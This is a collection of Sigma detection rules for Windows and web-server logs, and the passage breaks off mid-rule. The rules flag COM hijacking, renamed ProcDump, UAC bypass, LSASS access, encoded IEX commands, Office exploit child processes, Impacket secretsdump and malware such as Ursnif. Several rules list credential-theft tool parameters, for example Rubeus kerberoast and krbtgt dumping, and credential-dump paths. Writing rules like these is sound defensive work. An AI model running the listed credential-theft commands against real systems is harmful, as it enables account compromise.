1 | title: Windows Registry Persistence - COM key linking
2 | id: 9b0f8a61-91b2-464f-aceb-0527e0a45020
3 | status: experimental
4 | description: Detects COM object hijacking via TreatAs subkey
5 | references:
6 | - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
7 | author: Kutepov Anton, oscd.community
8 | date: 2019/10/23
9 | modified: 2019/11/07
10 | tags:
11 | - attack.persistence
12 | - attack.t1122
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 12
19 | TargetObject|startswith: 'HKU\'
20 | TargetObject|contains: '_Classes\CLSID\'
21 | TargetObject|endswith: '\TreatAs'
22 | condition: selection
23 | falsepositives:
24 | - Maybe some system utilities in rare cases use linking keys for backward compatibility
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_renamed_procdump.yml:
--------------------------------------------------------------------------------
1 | title: Renamed ProcDump
2 | id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67
3 | status: experimental
4 | description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
5 | references:
6 | - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
7 | author: Florian Roth
8 | date: 2019/11/18
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | OriginalFileName: 'procdump'
18 | filter:
19 | Image:
20 | - '*\procdump.exe'
21 | - '*\procdump64.exe'
22 | condition: selection and not filter
23 | falsepositives:
24 | - Procdump illegally bundled with legitimate software
25 | - Weird admins who renamed binaries
26 | level: critical
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_download_run_key.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RUN Key from Download
2 | id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be
3 | status: experimental
4 | description: Detects suspicious RUN keys created by software located in the Downloads directory or in temporary Outlook/Internet Explorer directories
5 | references:
6 | - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
7 | author: Florian Roth
8 | date: 2019/10/01
9 | tags:
10 | - attack.persistence
11 | - attack.t1060
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 13
18 | Image:
19 | - '*\Downloads\\*'
20 | - '*\Temporary Internet Files\Content.Outlook\\*'
21 | - '*\Local Settings\Temporary Internet Files\\*'
22 | TargetObject: '*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\*'
23 | condition: selection
24 | falsepositives:
25 | - Software installers downloaded and used by users
26 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_driver_load.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Driver Load from Temp
2 | id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75
3 | description: Detects a driver load from a temporary directory
4 | author: Florian Roth
5 | tags:
6 | - attack.persistence
7 | - attack.t1050
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 6
14 | ImageLoaded: '*\Temp\\*'
15 | condition: selection
16 | falsepositives:
17 | - A relevant set of false positives exists, depending on the applications in the environment
18 | level: medium
19 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_image_load.yml:
--------------------------------------------------------------------------------
1 | title: Possible Process Hollowing Image Loading
2 | id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7
3 | status: experimental
4 | description: Detects loading of samlib.dll or WinSCard.dll from an atypical process, e.g. through process hollowing by Mimikatz
5 | references:
6 | - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
7 | author: Markus Neis
8 | date: 2018/01/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1073
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image:
19 | - '*\notepad.exe'
20 | ImageLoaded:
21 | - '*\samlib.dll'
22 | - '*\WinSCard.dll'
23 | condition: selection
24 | falsepositives:
25 | - Very likely, needs more tuning
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_lsass_dll_load.yml:
--------------------------------------------------------------------------------
1 | title: DLL Load via LSASS
2 | id: b3503044-60ce-4bf4-bbcb-e3db98788823
3 | status: experimental
4 | description: Detects a method of loading a DLL via the LSASS process using an undocumented registry key
5 | author: Florian Roth
6 | date: 2019/10/16
7 | references:
8 | - https://blog.xpnsec.com/exploring-mimikatz-part-1/
9 | - https://twitter.com/SBousseaden/status/1183745981189427200
10 | logsource:
11 | product: windows
12 | service: sysmon
13 | detection:
14 | selection:
15 | EventID:
16 | - 12
17 | - 13
18 | TargetObject:
19 | - '*\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt*'
20 | - '*\CurrentControlSet\Services\NTDS\LsaDbExtPt*'
21 | condition: selection
22 | tags:
23 | - attack.execution
24 | - attack.t1177
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_powershell_rundll32.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Rundll32 Remote Thread Creation
2 | id: 99b97608-3e21-4bfe-8217-2a127c396a0e
3 | status: experimental
4 | description: Detects PowerShell remote thread creation in Rundll32.exe
5 | author: Florian Roth
6 | references:
7 | - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
8 | date: 2018/06/25
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | SourceImage: '*\powershell.exe'
16 | TargetImage: '*\rundll32.exe'
17 | condition: selection
18 | tags:
19 | - attack.defense_evasion
20 | - attack.execution
21 | - attack.t1085
22 | - attack.t1086
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_uac_bypass_sdclt.yml:
--------------------------------------------------------------------------------
1 | title: UAC Bypass via sdclt
2 | id: 5b872a46-3b90-45c1-8419-f675db8053aa
3 | status: experimental
4 | description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand
5 | references:
6 | - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
7 | author: Omer Yampel
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 13
14 | TargetObject: 'HKEY_USERS\\*\Classes\exefile\shell\runas\command\isolatedCommand'
15 | condition: selection
16 | tags:
17 | - attack.defense_evasion
18 | - attack.privilege_escalation
19 | - attack.t1088
20 | - car.2019-04-001
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_win_binary_github_com.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Binary Github Communication
2 | id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153
3 | status: experimental
4 | description: Detects an executable in the Windows folder accessing github.com
5 | references:
6 | - https://twitter.com/M_haggis/status/900741347035889665
7 | - https://twitter.com/M_haggis/status/1032799638213066752
8 | author: Michael Haag (idea), Florian Roth (rule)
9 | tags:
10 | - attack.lateral_movement
11 | - attack.t1105
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 3
18 | Initiated: 'true'
19 | DestinationHostname:
20 | - '*.github.com'
21 | - '*.githubusercontent.com'
22 | Image: 'C:\Windows\\*'
23 | condition: selection
24 | falsepositives:
25 | - 'Unknown'
26 | - '@subTee in your network'
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_win_binary_susp_com.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Binary Suspicious Communication Endpoint
2 | id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
3 | status: experimental
4 | description: Detects an executable in the Windows folder accessing suspicious domains
5 | references:
6 | - https://twitter.com/M_haggis/status/900741347035889665
7 | - https://twitter.com/M_haggis/status/1032799638213066752
8 | author: Florian Roth
9 | date: 2018/08/30
10 | tags:
11 | - attack.lateral_movement
12 | - attack.t1105
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 3
19 | Initiated: 'true'
20 | DestinationHostname:
21 | - '*dl.dropboxusercontent.com'
22 | - '*.pastebin.com'
23 | - '*.githubusercontent.com' # includes both gists and github repositories
24 | Image: 'C:\Windows\\*'
25 | condition: selection
26 | falsepositives:
27 | - 'Unknown'
28 | level: high
29 |
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_event_subscription.yml:
--------------------------------------------------------------------------------
1 | title: WMI Event Subscription
2 | id: 0f06a3a5-6a09-413f-8743-e6cf35561297
3 | status: experimental
4 | description: Detects creation of WMI event subscription persistence method
5 | references:
6 | - https://attack.mitre.org/techniques/T1084/
7 | tags:
8 | - attack.t1084
9 | - attack.persistence
10 | author: Tom Ueltschi (@c_APT_ure)
11 | date: 2019/01/12
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selector:
17 | EventID:
18 | - 19
19 | - 20
20 | - 21
21 | condition: selector
22 | falsepositives:
23 | - exclude legitimate (vetted) use of WMI event subscription in your network
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_commandline_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Command Line Event Consumer
2 | id: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6
3 | status: experimental
4 | description: Detects WMI command line event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image: 'C:\Windows\System32\wbem\WmiPrvSE.exe'
19 | ImageLoaded: 'wbemcons.dll'
20 | condition: selection
21 | falsepositives:
22 | - Unknown (data set is too small; further testing needed)
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_script_event_consumer_write.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer File Write
2 | id: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4
3 | status: experimental
4 | description: Detects file writes of WMI script event consumer
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 11
18 | Image: 'C:\WINDOWS\system32\wbem\scrcons.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown (data set is too small; further testing needed)
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/web_cve_2018_2894_weblogic_exploit.yml:
--------------------------------------------------------------------------------
1 | title: Oracle WebLogic Exploit
2 | id: 37e8369b-43bb-4bf8-83b6-6dd43bda2000
3 | description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
4 | author: Florian Roth
5 | date: 2018/07/22
6 | status: experimental
7 | references:
8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894
9 | - https://twitter.com/pyn3rd/status/1020620932967223296
10 | - https://github.com/LandGrey/CVE-2018-2894
11 | logsource:
12 | category: webserver
13 | detection:
14 | selection:
15 | c-uri-path:
16 | - '*/config/keystore/*.js*'
17 | condition: selection
18 | fields:
19 | - c-ip
20 | - c-dns
21 | falsepositives:
22 | - Unknown
23 | tags:
24 | - attack.t1100
25 | - attack.t1190
26 | - attack.initial_access
27 | - attack.persistence
28 | - attack.privilege_escalation
29 | - cve.2018-2894
30 | level: critical
31 |
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_admin_rdp_login.yml:
--------------------------------------------------------------------------------
1 | title: Admin User Remote Logon
2 | id: 0f63e1ef-1eb9-4226-9d54-8927ca08520a
3 | description: Detects remote logon by an Administrator user based on an internal account-naming pattern
4 | references:
5 | - https://car.mitre.org/wiki/CAR-2016-04-005
6 | tags:
7 | - attack.lateral_movement
8 | - attack.t1078
9 | - car.2016-04-005
10 | status: experimental
11 | author: juju4
12 | logsource:
13 | product: windows
14 | service: security
15 | definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account'
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 10
20 | AuthenticationPackageName: Negotiate
21 | AccountName: 'Admin-*'
22 | condition: selection
23 | falsepositives:
24 | - Legitimate administrative activity
25 | level: low
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_admin_share_access.yml:
--------------------------------------------------------------------------------
1 | title: Access to ADMIN$ Share
2 | id: 098d7118-55bc-4912-a836-dc6483a8d150
3 | description: Detects access to the ADMIN$ share
4 | tags:
5 | - attack.lateral_movement
6 | - attack.t1077
7 | status: experimental
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | definition: 'The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure'
13 | detection:
14 | selection:
15 | EventID: 5140
16 | ShareName: Admin$
17 | filter:
18 | SubjectUserName: '*$'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Legitimate administrative activity
22 | level: low
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_alert_lsass_access.yml:
--------------------------------------------------------------------------------
1 | title: LSASS Access Detected via Attack Surface Reduction
2 | id: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98
3 | description: Detects Access to LSASS Process
4 | status: experimental
5 | references:
6 | - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter
7 | author: Markus Neis
8 | date: 2018/08/26
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | # Defender Attack Surface Reduction
13 | logsource:
14 | product: windows_defender
15 | definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)'
16 | detection:
17 | selection:
18 | EventID: 1121
19 | Path: '*\lsass.exe'
20 | condition: selection
21 | falsepositives:
22 | - Google Chrome GoogleUpdate.exe
23 | - Some Taskmgr.exe related activity
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_apt_bluemashroom.yml:
--------------------------------------------------------------------------------
1 | title: BlueMashroom DLL Load
2 | id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
3 | status: experimental
4 | description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
5 | references:
6 | - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1117
10 | author: Florian Roth
11 | date: 2019/10/02
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\regsvr32*\AppData\Local\\*'
19 | - '*\AppData\Local\\*,DllEntry*'
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_atsvc_task.yml:
--------------------------------------------------------------------------------
1 | title: Remote Task Creation via ATSVC named pipe
2 | id: f6de6525-4509-495a-8a82-1f8b0ed73a00
3 | description: Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe
4 | author: Samir Bousseaden
5 | references:
6 | - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
7 | tags:
8 | - attack.lateral_movement
9 | - attack.persistence
10 | - attack.t1053
11 | - car.2013-05-004
12 | - car.2015-04-001
13 | logsource:
14 | product: windows
15 | service: security
16 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
17 | detection:
18 | selection:
19 | EventID: 5145
20 | ShareName: \\*\IPC$
21 | RelativeTargetName: atsvc
22 | Accesses: '*WriteData*'
23 | condition: selection
24 | falsepositives:
25 | - pentesting
26 | level: medium
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_cmdkey_recon.yml:
--------------------------------------------------------------------------------
1 | title: Cmdkey Cached Credentials Recon
2 | id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
3 | status: experimental
4 | description: Detects usage of cmdkey to look for cached credentials
5 | references:
6 | - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
7 | - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx
8 | author: jmallette
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\cmdkey.exe'
18 | CommandLine: '* /list *'
19 | condition: selection
20 | fields:
21 | - CommandLine
22 | - ParentCommandLine
23 | - User
24 | falsepositives:
25 | - Legitimate administrative tasks.
26 | level: low
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_control_panel_item.yml:
--------------------------------------------------------------------------------
1 | title: Control Panel Items
2 | id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4
3 | status: experimental
4 | description: Detects the use of a control panel item (.cpl) outside of the System32 folder
5 | reference:
6 | - https://attack.mitre.org/techniques/T1196/
7 | tags:
8 | - attack.execution
9 | - attack.t1196
10 | - attack.defense_evasion
11 | author: Kyaw Min Thein
12 | date: 2019/08/27
13 | level: critical
14 | logsource:
15 | product: windows
16 | category: process_creation
17 | detection:
18 | selection:
19 | CommandLine: '*.cpl'
20 | filter:
21 | CommandLine:
22 | - '*\System32\\*'
23 | - '*%System%*'
24 | condition: selection and not filter
25 | falsepositives:
26 | - Unknown
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_frombase64string.yml:
--------------------------------------------------------------------------------
1 | title: Encoded FromBase64String
2 | id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
3 | status: experimental
4 | description: Detects a base64 encoded FromBase64String keyword in a process command line
5 | author: Florian Roth
6 | date: 2019/08/24
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | - attack.defense_evasion
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine|base64offset|contains: '::FromBase64String'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - unknown
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_iex.yml:
--------------------------------------------------------------------------------
1 | title: Encoded IEX
2 | id: 88f680b8-070e-402c-ae11-d2914f2257f1
3 | status: experimental
4 | description: Detects a base64 encoded IEX command string in a process command line
5 | author: Florian Roth
6 | date: 2019/08/23
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine|base64offset|contains:
17 | - 'IEX (['
18 | - 'iex (['
19 | - 'iex (New'
20 | - 'IEX (New'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - unknown
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2015_1641.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2015-1641
2 | id: 7993792c-5ce2-4475-a3db-a3a5539827ef
3 | status: experimental
4 | description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
5 | references:
6 | - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
7 | - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
8 | author: Florian Roth
9 | date: 2018/02/22
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1036
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\WINWORD.EXE'
19 | Image: '*\MicroScMgmt.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_0261.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-0261
2 | id: 864403a1-36c9-40a2-a982-4c9a45f7d833
3 | status: experimental
4 | description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
7 | author: Florian Roth
8 | date: 2018/02/22
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\WINWORD.EXE'
19 | Image: '*\FLTLDR.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_11882.yml:
--------------------------------------------------------------------------------
1 | title: Droppers exploiting CVE-2017-11882
2 | id: 678eb5f4-8597-4be6-8be7-905e4234b53a
3 | status: experimental
4 | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
5 | references:
6 | - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
7 | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw
8 | author: Florian Roth
9 | date: 2017/11/23
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1211
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\EQNEDT32.EXE'
19 | condition: selection
20 | fields:
21 | - CommandLine
22 | falsepositives:
23 | - unknown
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_8759.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-8759
2 | id: fdd84c68-a1f6-47c9-9477-920584f94905
3 | description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
4 | references:
5 | - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
6 | - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
7 | tags:
8 | - attack.execution
9 | - attack.t1203
10 | author: Florian Roth
11 | date: 2017/09/15
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | ParentImage: '*\WINWORD.EXE'
18 | Image: '*\csc.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_hack_rubeus.yml:
--------------------------------------------------------------------------------
1 | title: Rubeus Hack Tool
2 | id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
3 | description: Detects command line parameters used by Rubeus hack tool
4 | author: Florian Roth
5 | references:
6 | - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
7 | date: 2018/12/19
8 | tags:
9 | - attack.credential_access
10 | - attack.t1003
11 | - attack.s0005
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '* asreproast *'
19 | - '* dump /service:krbtgt *'
20 | - '* kerberoast *'
21 | - '* createnetonly /program:*'
22 | - '* ptt /ticket:*'
23 | - '* /impersonateuser:*'
24 | - '* renew /ticket:*'
25 | - '* asktgt /user:*'
26 | - '* harvest /interval:*'
27 | condition: selection
28 | falsepositives:
29 | - unlikely
30 | level: critical
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_hack_smbexec.yml:
--------------------------------------------------------------------------------
1 | title: smbexec.py Service Installation
2 | id: 52a85084-6989-40c3-8f32-091e12e13f09
3 | description: Detects the use of the smbexec.py tool by matching a specific service installation
4 | author: Omer Faruk Celik
5 | date: 2018/03/20
6 | references:
7 | - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
8 | tags:
9 | - attack.lateral_movement
10 | - attack.execution
11 | - attack.t1077
12 | - attack.t1035
13 | logsource:
14 | product: windows
15 | service: system
16 | detection:
17 | service_installation:
18 | EventID: 7045
19 | ServiceName: 'BTOBTO'
20 | ServiceFileName: '*\execute.bat'
21 | condition: service_installation
22 | fields:
23 | - ServiceName
24 | - ServiceFileName
25 | falsepositives:
26 | - Penetration Test
27 | - Unknown
28 | level: critical
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_impacket_secretdump.yml:
--------------------------------------------------------------------------------
1 | title: Possible Impacket SecretDump remote activity
2 | id: 252902e3-5830-4cf6-bf21-c22083dfd5cf
3 | description: Detects AD credential dumping using the Impacket secretdump hack tool
4 | author: Samir Bousseaden
5 | references:
6 | - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
14 | detection:
15 | selection:
16 | EventID: 5145
17 | ShareName: \\*\ADMIN$
18 | RelativeTargetName: 'SYSTEM32\\*.tmp'
19 | condition: selection
20 | falsepositives:
21 | - pentesting
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_lethalhta.yml:
--------------------------------------------------------------------------------
1 | title: MSHTA spawned by SVCHOST as seen in LethalHTA
2 | id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471
3 | status: experimental
4 | description: Detects MSHTA.EXE spawned by SVCHOST as described in the LethalHTA report
5 | references:
6 | - https://codewhitesec.blogspot.com/2018/07/lethalhta.html
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1170
11 | author: Markus Neis
12 | date: 2018/06/07
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\svchost.exe'
19 | Image: '*\mshta.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_creddumper.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Malicious Service Install
3 | id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
4 | description: This method detects well-known keywords of malicious services in the Windows System Eventlog
5 | author: Florian Roth
6 | tags:
7 | - attack.credential_access
8 | - attack.t1003
9 | - attack.s0005
10 | logsource:
11 | product: windows
12 | service: system
13 | detection:
14 | selection1:
15 | EventID:
16 | - 7045
17 | keywords:
18 | Message:
19 | - '*WCE SERVICE*'
20 | - '*WCESERVICE*'
21 | - '*DumpSvc*'
22 | quarkspwdump:
23 | EventID: 16
24 | HiveName: '*\AppData\Local\Temp\SAM*.dmp'
25 | condition: ( selection1 and keywords ) or ( selection2 and keywords ) or quarkspwdump
26 | falsepositives:
27 | - Unlikely
28 | level: high
29 | ---
30 | logsource:
31 | product: windows
32 | service: security
33 | detection:
34 | selection2:
35 | EventID: 4697
36 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_ursnif.yml:
--------------------------------------------------------------------------------
1 | title: Ursnif
2 | id: 21f17060-b282-4249-ade0-589ea3591558
3 | status: experimental
4 | description: Detects new registry key created by Ursnif malware.
5 | references:
6 | - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
7 | - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
8 | tags:
9 | - attack.execution
10 | - attack.t1112
11 | author: megan201296
12 | date: 2019/02/13
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 13
19 | TargetObject: '*\Software\AppDataLow\Software\Microsoft\\*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_wceaux_dll.yml:
--------------------------------------------------------------------------------
1 | title: WCE wceaux.dll Access
2 | id: 1de68c67-af5c-4097-9c85-fe5578e09e67
3 | status: experimental
4 | description: Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host
5 | author: Thomas Patzke
6 | references:
7 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
8 | - https://jpcertcc.github.io/ToolAnalysisResultSheet
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | - attack.s0005
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID:
19 | - 4656
20 | - 4658
21 | - 4660
22 | - 4663
23 | ObjectName: '*\wceaux.dll'
24 | condition: selection
25 | falsepositives:
26 | - Penetration testing
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_malware_dridex.yml:
--------------------------------------------------------------------------------
1 | title: Dridex Process Pattern
2 | id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
3 | status: experimental
4 | description: Detects typical Dridex process patterns
5 | references:
